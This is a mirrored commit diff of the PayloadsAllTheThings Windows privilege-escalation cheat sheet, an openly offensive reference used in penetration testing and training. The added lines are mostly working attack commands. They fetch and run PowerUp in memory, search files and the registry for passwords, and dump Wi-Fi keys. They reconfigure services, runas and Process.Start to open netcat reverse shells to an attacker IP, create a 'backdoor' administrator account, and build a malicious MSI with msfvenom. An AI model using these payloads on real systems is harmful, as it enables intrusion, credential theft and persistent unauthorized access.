mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Windows PrivEsc - Full rewrite
This commit is contained in:
parent
2d5b4f2193
commit
ecadcf3d0f
@ -1,18 +1,46 @@
|
|||||||
# Windows - Privilege Escalation
|
# Windows - Privilege Escalation
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Tools](#tools)
|
||||||
|
* [Windows Version and Configuration](#)
|
||||||
|
* [User Enumeration](#)
|
||||||
|
* [Network Enumeration](#)
|
||||||
|
* [EoP - Looting for passwords](#)
|
||||||
|
* [EoP - Processes Enumeration and Tasks](#)
|
||||||
|
* [EoP - Incorrect permissions in services](#)
|
||||||
|
* [EoP - Windows Subsystem for Linux (WSL)](#)
|
||||||
|
* [EoP - Unquoted Service Paths](#)
|
||||||
|
* [EoP - Kernel Exploitation](#)
|
||||||
|
* [EOP - AlwaysInstallElevated](#)
|
||||||
|
* [EoP - Insecure GUI apps](#)
|
||||||
|
* [EoP - Runas](#)
|
||||||
|
|
||||||
## Tools
|
## Tools
|
||||||
|
|
||||||
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
|
||||||
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
|
||||||
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
|
||||||
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
|
||||||
|
```powershell
|
||||||
|
./windows-exploit-suggester.py --update
|
||||||
|
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
|
||||||
|
```
|
||||||
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
|
- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
|
||||||
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
|
- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
|
||||||
|
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
|
||||||
|
```powershell
|
||||||
|
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
||||||
|
```
|
||||||
|
|
||||||
## Windows Version and Configuration
|
## Windows Version and Configuration
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
|
||||||
|
```
|
||||||
|
|
||||||
|
Extract patchs and updates
|
||||||
|
```powershell
|
||||||
wmic qfe
|
wmic qfe
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -56,7 +84,7 @@ List all users
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
net user
|
net user
|
||||||
net users
|
net user Swissky
|
||||||
whoami /all
|
whoami /all
|
||||||
Get-LocalUser | ft Name,Enabled,LastLogon
|
Get-LocalUser | ft Name,Enabled,LastLogon
|
||||||
Get-ChildItem C:\Users -Force | select Name
|
Get-ChildItem C:\Users -Force | select Name
|
||||||
@ -121,10 +149,15 @@ List all current connections
|
|||||||
netstat -ano
|
netstat -ano
|
||||||
```
|
```
|
||||||
|
|
||||||
List firware state and current configuration
|
List firewall state and current configuration
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
netsh advfirewall firewall dump
|
netsh advfirewall firewall dump
|
||||||
|
|
||||||
|
or
|
||||||
|
|
||||||
|
netsh firewall show state
|
||||||
|
netsh firewall show config
|
||||||
```
|
```
|
||||||
|
|
||||||
List all network shares
|
List all network shares
|
||||||
@ -140,7 +173,7 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
|
|||||||
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
||||||
```
|
```
|
||||||
|
|
||||||
## Looting for passwords
|
## EoP - Looting for passwords
|
||||||
|
|
||||||
### SAM and SYSTEM files
|
### SAM and SYSTEM files
|
||||||
|
|
||||||
@ -153,11 +186,12 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
|
|||||||
%SYSTEMROOT%\System32\config\RegBack\system
|
%SYSTEMROOT%\System32\config\RegBack\system
|
||||||
```
|
```
|
||||||
|
|
||||||
### Search for file contents**
|
### Search for file contents
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
|
||||||
findstr /si password *.xml *.ini *.txt *.config
|
findstr /si password *.xml *.ini *.txt *.config
|
||||||
|
findstr /spin "password" *.*
|
||||||
```
|
```
|
||||||
|
|
||||||
### Search for a file with a certain filename
|
### Search for a file with a certain filename
|
||||||
@ -166,11 +200,20 @@ findstr /si password *.xml *.ini *.txt *.config
|
|||||||
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
|
||||||
```
|
```
|
||||||
|
|
||||||
### Search the registry for key names
|
### Search the registry for key names and passwords
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
REG QUERY HKLM /F "password" /t REG_SZ /S /K
|
||||||
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
REG QUERY HKCU /F "password" /t REG_SZ /S /K
|
||||||
|
|
||||||
|
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
|
||||||
|
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
|
||||||
|
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
|
||||||
|
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
|
||||||
|
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
|
||||||
|
|
||||||
|
reg query HKLM /f password /t REG_SZ /s
|
||||||
|
reg query HKCU /f password /t REG_SZ /s
|
||||||
```
|
```
|
||||||
|
|
||||||
### Read a value of a certain sub key
|
### Read a value of a certain sub key
|
||||||
@ -244,6 +287,8 @@ C:\inetpub\wwwroot\web.config
|
|||||||
%USERPROFILE%\ntuser.dat
|
%USERPROFILE%\ntuser.dat
|
||||||
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
|
||||||
%WINDIR%\System32\drivers\etc\hosts
|
%WINDIR%\System32\drivers\etc\hosts
|
||||||
|
dir c:*vnc.ini /s /b
|
||||||
|
dir c:*ultravnc.ini /s /b
|
||||||
```
|
```
|
||||||
|
|
||||||
### Wifi passwords
|
### Wifi passwords
|
||||||
@ -260,11 +305,11 @@ netsh wlan show profile <SSID> key=clear
|
|||||||
|
|
||||||
Oneliner method to extract wifi passwords from all the access point.
|
Oneliner method to extract wifi passwords from all the access point.
|
||||||
|
|
||||||
````batch
|
```batch
|
||||||
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
|
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
|
||||||
```
|
```
|
||||||
|
|
||||||
## Processes Enumeration and Tasks
|
## EoP - Processes Enumeration and Tasks
|
||||||
|
|
||||||
What processes are running?
|
What processes are running?
|
||||||
|
|
||||||
@ -295,6 +340,14 @@ Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,Last
|
|||||||
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
|
||||||
```
|
```
|
||||||
|
|
||||||
|
List services
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
net start
|
||||||
|
wmic service list brief
|
||||||
|
tasklist /SVC
|
||||||
|
```
|
||||||
|
|
||||||
Scheduled tasks
|
Scheduled tasks
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
@ -313,16 +366,82 @@ dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
|
|||||||
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## EoP - Incorrect permissions in services
|
||||||
|
|
||||||
## PowerSploit's PowerUp
|
> A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
|
||||||
|
|
||||||
Spot the weak service using PowerSploit's PowerUp
|
Often, services are pointing to writeable locations:
|
||||||
|
- Orphaned installs, not installed anymore but still exist in startup
|
||||||
|
- DLL Hijacking
|
||||||
|
- PATH directories with weak permissions
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
|
$ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
|
||||||
|
$ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
|
||||||
|
|
||||||
|
$ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
|
||||||
|
FOR /F %i in (Servicenames.txt) DO echo %i
|
||||||
|
type Servicenames.txt
|
||||||
|
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
|
||||||
|
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
## Windows Subsystem for Linux (WSL)
|
Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
|
||||||
|
|
||||||
|
Note to check file permissions you can use `cacls` and `icacls`
|
||||||
|
> icacls (Windows Vista +)
|
||||||
|
> cacls (Windows XP)
|
||||||
|
|
||||||
|
You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or `BUILTIN\Users:(W)`(Write-only access) in the output.
|
||||||
|
|
||||||
|
### Example with Windows XP SP1
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ sc config upnphost binpath="C:\Inetpub\wwwroot\nc.exe YOUR_IP 1234 -e C:\WINDOWS\System32\cmd.exe"
|
||||||
|
sc config upnphost obj=".\LocalSystem" password=""
|
||||||
|
sc qc upnphost
|
||||||
|
```
|
||||||
|
|
||||||
|
If it fails because of a missing dependency, try the following commands.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
sc config SSDPSRV start=auto
|
||||||
|
net start SSDPSRV
|
||||||
|
net stop upnphost
|
||||||
|
net start upnphost
|
||||||
|
|
||||||
|
sc config upnphost depend=""
|
||||||
|
```
|
||||||
|
|
||||||
|
Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
|
||||||
|
```powershell
|
||||||
|
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
|
||||||
|
RW SSDPSRV
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
RW upnphost
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
|
||||||
|
$ accesschk.exe -ucqv upnphost
|
||||||
|
upnphost
|
||||||
|
RW NT AUTHORITY\SYSTEM
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
RW BUILTIN\Administrators
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
RW NT AUTHORITY\Authenticated Users
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
RW BUILTIN\Power Users
|
||||||
|
SERVICE_ALL_ACCESS
|
||||||
|
|
||||||
|
$ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
|
||||||
|
$ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
|
||||||
|
$ sc stop <vuln-service>
|
||||||
|
$ sc start <vuln-service>
|
||||||
|
$ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
|
||||||
|
$ sc stop <vuln-service>
|
||||||
|
$ sc start <vuln-service>
|
||||||
|
```
|
||||||
|
|
||||||
|
## EoP - Windows Subsystem for Linux (WSL)
|
||||||
|
|
||||||
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
|
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
|
||||||
|
|
||||||
@ -339,17 +458,26 @@ Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-window
|
|||||||
|
|
||||||
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
|
Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
|
||||||
|
|
||||||
## Unquoted Service Paths
|
## EoP - Unquoted Service Paths
|
||||||
|
|
||||||
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
|
The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """
|
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
|
||||||
|
|
||||||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||||||
```
|
```
|
||||||
|
|
||||||
## Kernel Exploit
|
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
|
||||||
|
|
||||||
|
### Example
|
||||||
|
|
||||||
|
For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
|
||||||
|
- `C:\Program.exe`
|
||||||
|
- `C:\Program Files.exe`
|
||||||
|
|
||||||
|
|
||||||
|
## EoP - Kernel Exploitation
|
||||||
|
|
||||||
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
|
List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
|
||||||
|
|
||||||
@ -371,8 +499,32 @@ List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](h
|
|||||||
...
|
...
|
||||||
- [MS03-026](./MS03-026) [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
|
- [MS03-026](./MS03-026) [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
|
||||||
|
|
||||||
|
## EOP - AlwaysInstallElevated
|
||||||
|
|
||||||
## Runas
|
Check if these registry values are set to "1".
|
||||||
|
|
||||||
|
```bat
|
||||||
|
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
|
|
||||||
|
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||||
|
```
|
||||||
|
|
||||||
|
Then create an MSI package and install it.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
|
||||||
|
$ msiexec /quiet /qn /i C:\evil.msi
|
||||||
|
```
|
||||||
|
|
||||||
|
Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
|
||||||
|
|
||||||
|
## EoP - Insecure GUI apps
|
||||||
|
|
||||||
|
Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
|
||||||
|
|
||||||
|
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
|
||||||
|
|
||||||
|
## EoP - Runas
|
||||||
|
|
||||||
Use the `cmdkey` to list the stored credentials on the machine.
|
Use the `cmdkey` to list the stored credentials on the machine.
|
||||||
|
|
||||||
@ -390,8 +542,26 @@ The following example is calling a remote binary via an SMB share.
|
|||||||
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using `runas` with a provided set of credential.
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
|
||||||
|
```
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
|
||||||
|
$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
|
||||||
|
$ computer = "<hostname>"
|
||||||
|
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
|
* [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
|
||||||
|
* [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
|
||||||
|
* [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
|
||||||
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
|
||||||
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
|
||||||
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
|
||||||
|
@ -93,8 +93,9 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5
|
||||||
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70%
|
rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 -g 70 -r disk:share=/home/user/myshare
|
||||||
# -g : the screen will take up 70% of your actual screen size
|
# -g : the screen will take up 70% of your actual screen size
|
||||||
|
# -r disk:share : sharing a local folder during a remote desktop session
|
||||||
```
|
```
|
||||||
|
|
||||||
Note: you may need to enable it with the following command
|
Note: you may need to enable it with the following command
|
||||||
|
Loading…
Reference in New Issue
Block a user